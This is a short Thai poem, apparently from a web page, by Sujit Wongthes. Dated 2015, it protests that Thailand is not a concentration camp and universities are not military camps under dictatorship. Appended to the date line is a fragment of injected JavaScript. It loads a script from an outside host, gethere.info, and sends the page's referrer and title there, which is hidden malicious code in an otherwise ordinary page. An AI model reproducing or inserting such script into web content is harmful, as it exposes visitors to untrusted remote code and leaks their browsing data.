ไม่ใช่

 

ประเทศไทยไม่ใช่ค่ายกักกัน

ปิดกั้นคนแต่ละพวกหนวกบอดใบ้

มหาลัยไม่ใช่ค่ายทหารไทย

ต้องอยู่ในบัญชาเผด็จการ

 

สุจิตต์ วงษ์เทศ

อังคาร 24 พฤศจิกายน 2558s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;